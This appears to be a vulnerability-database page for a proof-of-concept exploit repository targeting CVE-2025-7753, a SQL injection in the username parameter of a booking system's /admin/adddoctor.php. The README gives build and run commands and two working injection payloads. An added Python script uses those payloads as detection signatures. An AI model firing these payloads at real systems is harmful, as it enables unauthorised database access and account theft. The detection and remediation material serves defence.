PoC details: cb78f6c3e59c462287c7b0686c34bc2ad43f9b16

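Source
Related vulnerability
Title: Code-Projects Online Appointment Booking System injection vulnerability (CVE-2025-7753)
Description: Code-Projects Online Appointment Booking System is an open-source online appointment booking system from Code-Projects. Version 1.0 contains an injection vulnerability: the Username parameter in the file /admin/adddoctor.php is handled improperly, which leads to SQL injection.
Description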
PoC Exploit for CVE-2025-7753 — Time-Based SQL Injection in Online Appointment Booking System 1.0 via the username parameter. Exploit written in C using libcurl.
Introduction
# 🚨 CVE-2025-7753 — SQL Injection PoC Exploit

**Author:** Byte Reaper  
**Telegram:** [@ByteReaper0](https://t.me/ByteReaper0)  
**CVE:** CVE-2025-7753  
**Vulnerability:** Unauthenticated, time‑based SQL Injection  

---

## 🔍 Overview

A critical SQL Injection vulnerability exists in **Online Appointment Booking System 1.0** (Code‑Projects) in the file  
`/admin/adddoctor.php`. The `username` parameter is not properly sanitized, allowing remote attackers to execute arbitrary SQL queries (time‑based, error‑based, union‑based, boolean‑based).

This repository provides the **first public PoC** written in C, leveraging **libcurl** for HTTP requests and ANSI‑colored output for clarity.

---

## ⚙️ Requirements

- **Operating System:** Linux (x86_64 recommended)  
- **Compiler:** GCC or Clang  
- **Dependencies:**  

  ```bash
  sudo apt update
  sudo apt install build-essential libcurl4-openssl-dev
  ```

## 🚀 Build & Run

Compile:

```bash
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
```

Execute (as root):

```bash
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
```

Verbose mode (optional):

```bash
sudo ./CODE_PROJECT -u http://TARGET/... -v
```

## 📜 Exploit Workflow

- Environment checks ensure you’re on Linux and running as root (auto‑escalates via sudo if needed).
- Payload array includes:
  - Time‑based (`SLEEP(5)`)
  - Error‑based (`RLIKE`, `CONCAT`, `COUNT`)
  - UNION‑based queries to dump schema, user, table names, and first user account.
- libcurl performs POST requests and captures server responses.
- Response parsing scans for SQL error strings to confirm vulnerability.

## 🧪 Payloads Tested

```
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz
11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm
```

… etc.
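
The payload families listed above can be read as detection signatures. The following Python example is added here and is not part of the original repository: it checks POST requests to `/admin/adddoctor.php` for those patterns in the `username` field and uses the response time to separate attempts from injections that likely executed. The log record format (`method`, `path`, `body`, `elapsed`) and the extra `benchmark` pattern are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, urlencode

TARGET_PATH = "/admin/adddoctor.php"  # endpoint named on this page
FIELD = "username"                    # parameter named on this page

# One signature per payload family in the README; "benchmark" is an added assumption.
SIGNATURES = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error-based": re.compile(r"\brlike\b|\b(concat|count)\s*\(", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "comment-terminated": re.compile(r"'.*--\s", re.I),
}

def match_signatures(record):
    """Return sorted signature names hit by the username field of one request."""
    path = record["path"].split("?", 1)[0]
    if record["method"] != "POST" or not path.endswith(TARGET_PATH):
        return []
    # parse_qs undoes URL encoding; keys are lowercased to cover "Username" too.
    fields = {k.lower(): v for k, v in parse_qs(record["body"]).items()}
    hits = set()
    for value in fields.get(FIELD, []):
        hits.update(n for n, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

def triage(record, delay=5.0):
    """clean / attempt / likely-executed (delay matches the README's SLEEP(5))."""
    hits = match_signatures(record)
    if not hits:
        return "clean"
    if "time-based" in hits and record["elapsed"] >= delay:
        return "likely-executed"  # the injected delay showed up in the response time
    return "attempt"

def rec(username, elapsed):
    """Build one constructed log record (hypothetical format, not a real log schema)."""
    return {"method": "POST", "path": "/Online-Appointment-Booking-System-master" + TARGET_PATH,
            "body": urlencode({"username": username}), "elapsed": elapsed}

# Constructed sample records; the two payloads are the ones quoted in the README.
SAMPLES = [
    rec("dr.smith", 0.08),
    rec("11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz", 5.21),
    rec("11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm", 0.11),
]

if __name__ == "__main__":
    print([(triage(r), match_signatures(r)) for r in SAMPLES])
```

Signature matching on request bodies is a triage aid; the fix is to bind `username` as a query parameter in `adddoctor.php` instead of concatenating it into the SQL string.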

## License
MIT 
File snapshot

[4.0K] /data/pocs/cb78f6c3e59c462287c7b0686c34bc2ad43f9b16
├── [ 15K] exploit.c
├── [1.0K] LICENSE
└── [1.8K] README.md

0 directories, 3 files